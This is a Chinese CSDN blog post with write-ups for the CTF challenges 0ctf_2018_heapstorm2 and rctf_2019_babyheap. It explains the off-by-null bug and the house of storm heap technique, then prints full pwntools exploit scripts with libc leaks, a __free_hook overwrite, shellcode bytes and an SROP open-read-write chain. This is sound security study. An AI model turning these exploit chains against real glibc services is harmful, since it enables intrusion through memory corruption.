0ctf_2018_heapstorm2 && rctf_2019_babyheap

已于 2023-06-16 07:53:07 修改
阅读量254 收藏 1
点赞数 2
分类专栏: pwn刷题笔记 文章标签: python c语言
于 2023-06-14 17:17:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73149934/article/details/131212135
版权
0ctf_2018_heapstorm2
这道题算是house of storm的起源

house of storm,poison null byte,堆风水

题目分析
  1. sub_BE6

这是一个初始化函数
image.png
heaparray的初始化具体就是这样:
image.png
同时,mallopt函数禁用了fastbin
mallopt函数```csharp
int mallopt (int __param, int __val);

参数 __param的取值范围:-8<=param<=-1 || 1<=param<=4 如下:
```c
#define M_TRIM_THRESHOLD    -1
#define M_TOP_PAD           -2
#define M_MMAP_THRESHOLD    -3
#define M_MMAP_MAX          -4
#define M_CHECK_ACTION      -5
#define M_PERTURB           -6
#define M_ARENA_TEST        -7
#define M_ARENA_MAX         -8
 
#ifndef M_MXFAST
# define M_MXFAST  1    /* maximum request size for "fastbins" */
#endif
#ifndef M_NLBLKS
# define M_NLBLKS  2    /* UNUSED in this malloc */
#endif
#ifndef M_GRAIN
# define M_GRAIN   3    /* UNUSED in this malloc */
#endif
#ifndef M_KEEP
# define M_KEEP    4    /* UNUSED in this malloc */
#endif

在本题禁用了fastbin

具体就是这样:
image.png

  1. add

image.png
可见对size和content_ptr进行了混淆
image.png

  1. edit

image.png
这看似没有问题,但是注意,strcpy函数会在末尾加上null,相当于13个字节,发生了off by null

  1. delete

image.png

  1. show

image.png
show不能直接使用,还需要满足一个条件

exp

image.png
漏洞原理:strcpy函数造成的off by null
信息梳理:最多16个堆块,0xC<size<0x1000
攻击思路:利用poison null byte造成堆重叠,house of storm申请堆块控制heaparray
详细步骤

  1. 排布好chunk
#---------------布置chunk-------------------------#
add(0x18)#0	  为了off_by_null修改1的size
add(0x508)#1
add(0x18)#2
#---------------
add(0x18)#3   为了off_by_null修改4的size
add(0x508)#4
add(0x18)#5   
#---------------
add(0x18)#6   防止合并到top_chunk
  1. 堆重叠控制unsorted chunk
edit(1,b'\x00'*0x4F0+p64(0x500)) #伪造pre_size
delete(1)
edit(0,b'\x00'*(0x18-12)) #修改chunk1的size,0x511->0x500
add(0x18) #1 
add(0x4d8) #7    把0x500用完

delete(1)   
delete(2) #1-2 合并(7被覆盖,7是控制chunk)

分配合适的chunk,chunk2是unsorted chunk(0x4f1),此时处于分配状态。

add(0x38)#1
add(0x4e8)#2   chunk7控制chunk2
  1. 堆重叠控制large chunk
edit(4,b'\x00'*0x4F0+p64(0x500))#伪造chunk
delete(4)
edit(3,b'\x00'*(0x18-12)) #修改chunk4的size, 0x511->0x500
add(0x18) #4
add(0x4d8) #8   把0x500用完

delete(4)
delete(5) #4-5 合并(8被覆盖,8是控制chunk)

分配合适的chunk,unsortedbin 剩余的一个chunk(0x4e1)是我们需要的largebin chunk,此时处于释放状态

add(0x48)#4  此时unsorted bin中剩下一个0x4e1大小的chunk,且与8重叠,
"""
unsortedbin
all:largebin chunk(0x4e1)
"""
  1. 将unsortedbin chunk与largebin chunk放到对应位置
#---------------unsorted chunk 和 large chunk 放到对应位置----------------------#
delete(2)  #得到unsortedbin chunk(0x4f1)
"""
unsortedbin
all:unsortedbin chunk(0x4f1) --> largebin chunk(0x4e1) --> unsortedbin链表头
"""
add(0x4e8) #把0x4e1的chunk放入到largebin,返回unsortedbin chunk
delete(2)  #把0x4F1的chunk放入到unsorted bin中
"""
unsortedbin
all:unsortedbin chunk(0x4f1) --> unsortedbin链表头

largebin
0x3:largebin chunk(0x4e1) --> largebin链表头
"""
  1. 修改chunk以满足house of storm的条件
#--------------修改他们是的满足条件进行 house of strom------------------------------#
fake_chunk = 0x13370800 - 0x20
payload = b'\x00' * 0x10 + p64(0) + p64(0x4f1) + p64(0) + p64(fake_chunk)
edit(7, payload) #修改unsorted chunk的bk

image.png
image.png

payload = b'\x00' * 0x20 + p64(0) + p64(0x4e1) + p64(0) + p64(fake_chunk+8) + p64(0) + p64(fake_chunk-0x18-5)
edit(8, payload) #修改 large chunk 的 bk 和 bk_nextsize

image.png
image.png
申请到fake_chunk,此时我们成功得到了heaparray的控制权

add(0x48)  #2  -> 0x133707e0   成功将申请到了heaparray附近

image.png

  1. 修改堆指针,泄露随机数,接下来就可以随心所欲控制heaparray了。改free_hook为system_plt。

参照大佬的wp

# !/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'

p = process('./p')
libc = ELF('./libc-2.24.so')

def dbg():
	gdb.attach(p)

    
def add(size):
    p.sendlineafter('Command: ','1')
    p.sendlineafter('Size: ',str(size))  # 12<size<0x1000


def edit(idx,content):
    p.sendlineafter('Command: ','2')
    p.sendlineafter('Index: ',str(idx))
    p.sendlineafter('Size: ',str(len(content)))
    p.sendafter('Content: ',content)



def delete(idx):
    p.sendlineafter('Command: ','3')
    p.sendlineafter('Index: ',str(idx))


def show(idx):
    p.sendlineafter('Command: ','4')
    p.sendlineafter('Index: ',str(idx))

#---------------布置chunk-------------------------#
add(0x18)#0	  off_by_null修改1的size
add(0x508)#1
add(0x18)#2
#---------------
add(0x18)#3   off_by_null修改4的size
add(0x508)#4
add(0x18)#5   
#---------------
add(0x18)#6   防止合并到top_chunk

#----------------准备 unsorted chunk-----------------------#
edit(1,b'\x00'*0x4F0+p64(0x500)) #伪造chunk
delete(1)
edit(0,b'\x00'*(0x18-12)) #修改chunk1的size, 0x511->0x500
add(0x18) #1 
add(0x4d8) #7    把0x500用完

delete(1)   
delete(2) #1-2 合并   这是就存在堆重叠

add(0x38)#1
add(0x4e8)#2   chunk7的content指向chunk2的chunk-0x10位置处,我们可以实现控制unsorted chunk

#-------------------准备 large chunk-----------------------------------#
edit(4,b'\x00'*0x4F0+p64(0x500))#伪造chunk
delete(4)
edit(3,b'\x00'*(0x18-12)) #修改chunk4的size, 0x511->0x500
add(0x18) #4
add(0x4d8) #8   把0x500用完

delete(4)
delete(5) #4-5 合并 这是就存在堆重叠

add(0x48)#4  此时unsorted bin中剩下一个0x4e1大小的chunk,且与8重叠,我们可以实现控制large chunk
#---------------unsorted chunk 和 large chunk 放到对应位置----------------------#
delete(2)
add(0x4e8) #把0x4e1的chunk放入到largebin中
delete(2)  #把0x4F1的chunk放入到unsorted bin中
#--------------修改他们是的满足条件进行 house of strom------------------------------#
fake_chunk = 0x13370800 - 0x20
payload = b'\x00' * 0x10 + p64(0) + p64(0x4f1) + p64(0) + p64(fake_chunk)
edit(7, payload) #修改unsorted chunk的bk

payload = b'\x00' * 0x20 + p64(0) + p64(0x4e1) + p64(0) + p64(fake_chunk+8) + p64(0) + p64(fake_chunk-0x18-5)
edit(8, payload) #修改 large chunk 的 bk 和 bk_nextsize
add(0x48)  #2  -> 0x133707e0   成功将申请到了heaparray附近
#-----------------------泄漏 libc----------------------------------#
#由于bins中的chunk的fd,bk指向libc的地址,我们先要泄漏heap的地址

payload = p64(0)*6 + p64(0x13370800)
edit(2, payload) #修改了r0~r4为0,并且修改了chunk0的地址,此时的chunk0的size非常大,因为异或的是0

payload = p64(0)*3 +p64(0x13377331)  #满足show的条件
payload += p64(0x13370800) + p64(0x1000) #chunk0
payload += p64(fake_chunk+3) + p64(8)   #chunk1
edit(0, payload) #满足show的条件

show(1)  #我们刚刚house of storm 写的地址泄漏出来
p.recvuntil("]: ")
heap = u64(p.recv(6).ljust(8, b'\x00'))
success("heap:"+hex(heap))


payload  = p64(0)*3 + p64(0x13377331)#满足show的条件
payload += p64(0x13370800) + p64(0x1000) #chunk0
payload += p64(heap+0x10) + p64(8) #chunk1
edit(0, payload)

show(1) #泄漏libc地址
p.recvuntil("]: ")
malloc_hook = u64(p.recv(6).ljust(8, b'\x00')) -0x58 - 0x10
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base+libc.sym['__free_hook']
system = libc_base+ libc.sym['system']
success("free_hook:"+hex(free_hook))
#--------------修改 free_hook -----------------------------------#
payload  = p64(0)*4
payload += p64(free_hook) + p64(0x100)#chunk0
payload += p64(0x13370800+0x40) + p64(8)#chunk1
payload += b'/bin/sh\x00'
edit(0, payload)
edit(0, p64(system))
delete(1)

p.interactive()

rctf_2019_babyheap

在buu上有复现

2.23-0ubuntu11house of storm,poison null byte,堆风水,堆orw
image.png
image.png

题目分析

跟上一题很相似,但是开了沙箱,自己独立完成费了好一番功夫(主要还是菜)

exp
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:xinri
she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
she_amd64_30=b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
s	= lambda payload		:io.send(payload)
sl  = lambda payload		:io.sendline(payload)
sa  = lambda a,b			:io.sendafter(a,b)
sla = lambda a,b			:io.sendlineafter(a,b)
r   = lambda num   		 :io.recv(num)
ru  = lambda data				:io.recvuntil(data)
rl	= lambda a=False		:io.recvline(a)
uu32 = lambda 				:u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b"\x00") ) 
uu64 = lambda 				:u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00") )

ep= lambda data 			:elf.plt[data]
eg= lambda data 			:elf.got[data]
es= lambda data           :elf.sym[data]
ls= lambda data 			:libc.sym[data]


c  = lambda num         :cyclic(num) 
itr = lambda 				:io.interactive()
pt = lambda s				:log.info('\033[1;31;40m %s --- %s \033[0m' % (s,type(eval(s))))
lg = lambda name,addr :log.success('\033[1;31;40m{} ==> {:#x}\033[0m'.format(name, addr))
lg1 = lambda name,addr :log.success('\033[01;38;5;214m{} ==> {:#x}\033[0m'.format(name, addr))
pn = lambda name        :print("\033[01;38;5;214mOCT:%d\nHEX:%s \033[0m"%(name,hex(name)))
def dbg():
	gdb.attach(io)
	#pause()
	
#------------------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
context(os="linux",arch="amd64")#------------
name="./p"#-------------
context.log_level="debug"
elf=ELF(name)
libc=ELF("./tools/buulibc-2.23.so")
#------------------------------------------------------------------
choose=11
if choose==1:
	#ENV={"LD_PRELOAD":"/home/xinri/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so"}
	#io=process(["/home/xinri/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so",name],env=ENV)
	io=process(name)
else:
	io=remote("node4.buuoj.cn",26525)
	
def add(size):	
	sla("Choice: ","1")
	sla("Size: ",str(size))

def delete(index):
	sla("Choice: ","3")
	sla("Index: ",str(index))
	
def show(index):
	sla("Choice: ","4")
	sla("Index: ",str(index))
	
def edit(index, content):
	sla("Choice: ","2")
	sla("Index: ",str(index))
	sa("Content: ",content)
	
#------------------------------------------------------------------
def pwn():

	add(0x18)#--0
	add(0x500)
	add(0x18)
	
	add(0x18)#--3
	add(0x500)
	add(0x18)
	
	add(0x18)#--6
	
#-----unsorted chunk
	edit(1,b"\x00"*0x4f0+p64(0x500))
	delete(1)
	edit(0,b"a"*0x18)
	add(0x80)
	add(0x460)#7
	delete(1)
	delete(2)
	add(0x80)#1
	add(0x490)  #--2 7 overlap
	delete(2)
	show(7)
	leak=uu64()
	libc_base=leak-88-0x3c4b20
	lg("libc_base",libc_base)
	add(0x490)#2
#-----large chunk
	edit(4,b"\x00"*0x4f0+p64(0x500))
	delete(4)
	edit(3,b"a"*0x18)
	add(0x80)#4
	add(0x460)#8
	delete(4)
	delete(5)
	add(0x70)#4
	add(0x480)	#--5 8 overlap
	
#------prepare-------
	delete(5)
	delete(2)
	add(0x490)#2
	show(8)
	heap_base=u64(r(6).ljust(8,b"\x00"))-0x5f0
	lg("heap_base",heap_base)
	delete(4)
	delete(5)
	add(0x90)#4
	add(0x480)#5
	
	delete(5)
	delete(2)
	add(0x490)#2
	delete(2)
	
	
#------storm------
	
	__free_hook=libc_base+ls("__free_hook")
	fake_chunk=__free_hook-0x10
	#dbg()
	edit(7,p64(0)+p64(fake_chunk))
	edit(8,p64(0)+p64(0x491)+p64(0)+p64(fake_chunk+0x8)+p64(0)+p64(fake_chunk-0x1d))
	add(0x48)#2
	
	
#------recover-----
	
	edit(2,p64(0)*2)
	unsorted_fd_bk=leak
	large_fd_bk=leak+0x410
	large_fd_bk_nextsize=heap_base+0x610
	#lg1("large_fd_bk",large_fd_bk)
	edit(7,p64(unsorted_fd_bk)*2)
	edit(8,p64(0)+p64(0x491)+p64(large_fd_bk)*2+p64(large_fd_bk_nextsize)*2)
	
#----orw------
	add(0x600) #5 frame
	add(0x600) #9 orw
	
	setcontext_53=libc_base+ls("setcontext")+53
	edit(2,p64(setcontext_53)+p64(0))
	
	rdi=0x0000000000021102+libc_base
	rsi=0x00000000000202e8+libc_base
	rdx=0x0000000000001b92+libc_base
	_open=ls("open")+libc_base
	_read=ls("read")+libc_base
	_write=ls("write")+libc_base
	framechunk_addr=heap_base+0xac0
	orwchunk_addr=heap_base+0x10d0
	
	ret=libc_base+0x0000000000000937
	frame=SigreturnFrame(kernel="amd64")
	frame.rsp=orwchunk_addr+0x10
	frame.rip=ret
	
	
	orw=flat([rdi,orwchunk_addr+0xb8,rsi,0,rdx,0,_open])
	orw+=flat([rdi,3,rsi,orwchunk_addr+0x200,rdx,0x100,_read])
	orw+=flat([rdi,1,rsi,orwchunk_addr+0x200,rdx,0x100,_write])
	orw+=b"./flag\x00"
	edit(5,bytes(frame))
	edit(9,orw)
	edit(2,p64(setcontext_53)+p64(0))
	#dbg()
	delete(5)
	#delete(9)
	#dbg()
	itr()
if __name__ == '__main__':
	while True:
		try:
			io=remote("node4.buuoj.cn",26525)
			pwn()
		except:
			io.close()

详细过程类似heapstorm2,申请到__free_hook的chunk(为了方便后面的orw,需要泄露堆基址)

# !/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:xinri
she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
she_amd64_30=b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
s	= lambda payload		:io.send(payload)
sl  = lambda payload		:io.sendline(payload)
sa  = lambda a,b			:io.sendafter(a,b)
sla = lambda a,b			:io.sendlineafter(a,b)
r   = lambda num   		 :io.recv(num)
ru  = lambda data				:io.recvuntil(data)
rl	= lambda a=False		:io.recvline(a)
uu32 = lambda 				:u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b"\x00") ) 
uu64 = lambda 				:u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00") )

ep= lambda data 			:elf.plt[data]
eg= lambda data 			:elf.got[data]
es= lambda data           :elf.sym[data]
ls= lambda data 			:libc.sym[data]


c  = lambda num         :cyclic(num) 
itr = lambda 				:io.interactive()
pt = lambda s				:log.info('\033[1;31;40m %s --- %s \033[0m' % (s,type(eval(s))))
lg = lambda name,addr :log.success('\033[1;31;40m{} ==> {:#x}\033[0m'.format(name, addr))
lg1 = lambda name,addr :log.success('\033[01;38;5;214m{} ==> {:#x}\033[0m'.format(name, addr))
pn = lambda name        :print("\033[01;38;5;214mOCT:%d\nHEX:%s \033[0m"%(name,hex(name)))
def dbg():
	gdb.attach(io)
	#pause()
#------------------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
context(os="linux",arch="amd64")#------------
name="./p"#-------------
context.log_level="debug"
elf=ELF(name)
libc=ELF("./tools/buulibc-2.23.so")
#------------------------------------------------------------------
choose=1
if choose==1:
	#ENV={"LD_PRELOAD":"/home/xinri/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so"}
	#io=process(["/home/xinri/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so",name],env=ENV)
	io=process(name)
else:
	io=remote("")
	
def add(size):	
	sla("Choice: ","1")
	sla("Size: ",str(size))

def delete(index):
	sla("Choice: ","3")
	sla("Index: ",str(index))
	
def show(index):
	sla("Choice: ","4")
	sla("Index: ",str(index))
	
def edit(index, content):
	sla("Choice: ","2")
	sla("Index: ",str(index))
	sa("Content: ",content)
	
#------------------------------------------------------------------
def pwn():

	add(0x18)#--0
	add(0x500)
	add(0x18)
	
	add(0x18)#--3
	add(0x500)
	add(0x18)
	
	add(0x18)#--6
	
#-----unsorted chunk
	edit(1,b"\x00"*0x4f0+p64(0x500))
	delete(1)
	edit(0,b"a"*0x18)
	add(0x80)
	add(0x460)#7
	delete(1)
	delete(2)
	add(0x80)#1
	add(0x490)  #--2 7 overlap
	delete(2)
	show(7)
	leak=uu64()
	libc_base=leak-88-0x3c4b20
	lg("libc_base",libc_base)
	add(0x490)#2
#-----large chunk
	edit(4,b"\x00"*0x4f0+p64(0x500))
	delete(4)
	edit(3,b"a"*0x18)
	add(0x80)#4
	add(0x460)#8
	delete(4)
	delete(5)
	add(0x70)#4
	add(0x480)	#--5 8 overlap
	
#------prepare-------
	delete(5)
	delete(2)
	add(0x490)#2
	show(8)
	heap_base=u64(r(6).ljust(8,b"\x00"))-0x5f0
	lg("heap_base",heap_base)
	delete(4)
	delete(5)
	add(0x90)#4
	add(0x480)#5
	
	delete(5)
	delete(2)
	add(0x490)#2
	delete(2)
	
	
#------storm------
	
	__free_hook=libc_base+ls("__free_hook")
	fake_chunk=__free_hook-0x10
	#dbg()
	edit(7,p64(0)+p64(fake_chunk))
	edit(8,p64(0)+p64(0x491)+p64(0)+p64(fake_chunk+0x8)+p64(0)+p64(fake_chunk-0x1d))
	add(0x48)#2

此时unsortedbin和largebin都处于corrupted,进行链表修复,以便于后续操作

#------recover-----
	
	edit(2,p64(0)*2)
	unsorted_fd_bk=leak
	large_fd_bk=leak+0x410
	large_fd_bk_nextsize=heap_base+0x610
	#lg1("large_fd_bk",large_fd_bk)
	edit(7,p64(unsorted_fd_bk)*2)
	edit(8,p64(0)+p64(0x491)+p64(large_fd_bk)*2+p64(large_fd_bk_nextsize)*2)

接下来就是orw,我使用的是SROP跳到ropchain上的方法

#----orw------
	add(0x600) #5 frame
	add(0x600) #9 orw
	
	setcontext_53=libc_base+ls("setcontext")+53
	edit(2,p64(setcontext_53)+p64(0))
	
	rdi=0x0000000000021102+libc_base
	rsi=0x00000000000202e8+libc_base
	rdx=0x0000000000001b92+libc_base
	_open=ls("open")+libc_base
	_read=ls("read")+libc_base
	_write=ls("write")+libc_base
	framechunk_addr=heap_base+0xac0
	orwchunk_addr=heap_base+0x10d0
	
	ret=libc_base+0x0000000000000937
	frame=SigreturnFrame(kernel="amd64")
	frame.rsp=orwchunk_addr+0x10
	frame.rip=ret
	
	orw=flat([rdi,orwchunk_addr+0xb8,rsi,0,rdx,0,_open])
	orw+=flat([rdi,3,rsi,orwchunk_addr+0x200,rdx,0x100,_read])
	orw+=flat([rdi,1,rsi,orwchunk_addr+0x200,rdx,0x100,_write])
	orw+=b"./flag\x00"
	edit(5,bytes(frame))
	edit(9,orw)
	edit(2,p64(setcontext_53)+p64(0))
	dbg()
	delete(5)
	#delete(9)
	#dbg()
	itr()

其它方法

mprotect改shellcode权限的做法也可以

BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1635
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
0ctf2018_heapstorm2_reproduce
Gtooler的博客
02-23 371
0ctf2018_heapstorm2_reproduce 概述 打了好久,学到很多 保护全开,libc-2.24 漏洞点在 off-by-one,打法是利用 off-by-one 缩小 chunk 进行 unlink 然后就可以实现类似 uaf 的 overlap,是 unlink 的一部分,又是还能用的这种 overlap 有了 overlap 就能实现 house of storm,也就是同时伪造 large_bin 的 bk_nextsize 和 bk 与 unsorted_bin 的 bk,实现
【pwn challenge】0ctf_2018_heapstorm2
weixin_43960998的博客
03-02 517
程序 很早以前就想把这题做了,但是感觉特别麻烦就一直拖着了,今日参考了一位师傅然后解决。 程序先是禁用了 fastbin,让你和 mmap 了一段内存,并往该内存中读取了一串随机数,然后进行一个简单的赋值,接着通过一个 for 循环将接下来用到的存放 ptr 和 size 的地方进行了异或操作: 最终是如下效果: 然后是添加堆块功能: 利用 calloc 分配,会清空原堆块的内容,这就需要 overlap 的时候对其中的 chunk header 等进行恢复。 update 功能中存在 off b
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)
weixin_44145820的博客
04-25 1765
目录题目分析漏洞利用Exp 题目分析 这题估计是house of storm利用的起源? 因为用这种办法直接就可以做通,后面还有rctf_2019_babyheap也需要用到house of storm,但是那题限制条件多多了 init()里先把fastbin禁用了 申请了0x13370000这块内存,并且做了初始化 初始化首先读入长度为0x18的随机数,就记为3个long long随机数吧...
rctf_2019_babyheap0ctf_2018_heapstorm2学习(house of storm)
weixin_46521144的博客
09-10 1574
0ctf_2018_heapstorm2 这道题算是house of storm的起源。 house of storm的原理其实就是:结合利用largebin attack和劫持unsortedbin后一个chunk的bk,实现把堆地址写入到任意地址,再结合unsortedbin的bk指针分配时只检查size而不检查chunk完整性(这里有点疑惑,unlink检查应该很严格,可能是绕过了而不是没有检查)分配到这个地址上(add(0x48))实现的结果和unlink差不多。 具体利用条件: glibc2.3
BUUCTF pwn 四月刷题
coco的博客
04-07 914
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
0ctf2018_heapstorm2 wp
weixin_44008345的博客
04-08 369
0ctf_2018_heapstorm2,large bin attack题
0ctf-2018 heapstorm2详解
极目楚天舒的博客
05-20 2226
0x01 预备知识堆相关的数据结构通过malloc得到的我们称之为chunk,每一个chunk都有一个chunk头用于管理称之为malloc_chunk,定义如下:/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing a...
【buuctf】cscctf_2019_qual_babyheap
weixin_51055545的博客
02-15 1923
buuctf【cscctf_2019_qual_babyheap】 今天找了一道100分题目,题目本身并没有那么难 例行检查 64位的程序,保护机制全开,放到IDA中分析 漏洞分析 函数功能很简单,功能基本齐全,漏洞点在creat()中, 当我们申请堆块,写入内容时,会在最后多写入一个’\x00’字节,存在off by null 溢出,但程序只允许我们申请15个堆块,因此要合理利用堆块。 利用思路 1.通过for循环申请足够多的堆块,在将其释放,构造出unsorted bin 2.堆风水,利用off
house of storm+堆SROP+orw
tbsqigongzi的博客
08-10 532
house of storm + srop + orw
(BUUCTF0ctf_2018_heapstorm2
xy1458214551的博客
01-23 707
BUUCTF0ctf_2018_heapstorm2题解
large bin attack & house of strom
seaaseesa的博客
06-12 1301
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
buuoj Pwn writeup 166-170
yongbaoii的博客
06-03 296
166 picoctf_2018_echo back 167 168 169 170
RCTF-2018 babyheap详解
极目楚天舒的博客
06-19 2018
0x01题目分析qts@qts-PC:~/奇幻世界/RCTF2018/babyheap_38af156349af04e8f6dc22a0ffee6a7a$ ./checksec.sh --file babyheap RELRO STACK CANARY NX PIE RPATH RUNPATH FIL...
buuoj Pwn writeup 196-200
yongbaoii的博客
06-12 454
196 gyctf_2020_bfnote 第一个漏洞点是有栈溢出,但是开了canary。第二个漏洞点是虽然会检测v4大小,但是检测完时候我们还能再次输入,所以我们会有一次任意输入的机会。 我们的想法就是改掉TLS结构体中的canary,然后rop即可。 tls结构体 typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor u
0ctf2017-babyheap
weixin_30878361的博客
08-03 352
前言 又是一道令人怀疑人生的 baby 题。 这道题利用思路非常巧妙,通过 堆溢出 和 fastbin 的机制构造了 information leak, 然后通过 fastbin attack 可以读写 malloc_hook , 然后使用 one_gadget 来 getshell. 题目和 idb 文件:https://gitee.com/hac425/blog_data/tree/maste...
heap_2.c详解--------FreeRTOS内存管理
时光漫走
08-31 974
heap_2.c源码分析 #undef MPU_WRAPPERS_INCLUDED_FROM_API_FILE #if( configSUPPORT_DYNAMIC_ALLOCATION == 0 )     #error This file must not be used if configSUPPORT_DYNAMIC_ALLOCATION is 0 #endif /* A
Python构建去中心化广告平台——区块链驱动的未来营销新模式
最新发布
Echo_Wish
04-07 719
用户隐私泄露、广告投放的黑箱操作、中心化平台的过度控制,使得广告生态亟需去中心化的变革。去中心化广告不仅让广告商掌控自己的预算,也让用户能从观看广告中获益,最终实现更健康的广告经济。同时,可以修改广告状态,使广告下架或重新激活。让广告交易透明化,广告商与用户直接互动,从而优化广告投放体验。构建一个去中心化广告平台,让广告市场更加透明、公平、高效。,避免中心化服务器的宕机风险,同时保证内容不被随意修改。让用户观看广告后获得奖励,提高广告互动率。,这些都是未来广告去中心化发展的方向。
PDF 中提取数学公式
活到老、学到老
04-07 471
你如果用 Python 的话,只需要运行。这样你能直接把所有 LaTeX 结果写入。免费额度有限,每天10~20张图。拍照或拖图片即可生成 LaTeX。只适合展示,不适合识别。
ctf_fl3x_v2
01-03
### 关于 ctf_fl3x_v2 的介绍 ctf_fl3x_v2 是一款专为 CTF(夺旗竞赛)设计的综合性平台和工具集,旨在帮助参赛者更好地准备并参与各类网络安全挑战。此平台不仅提供了多种类型的题目练习环境,还包含了丰富的学习...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值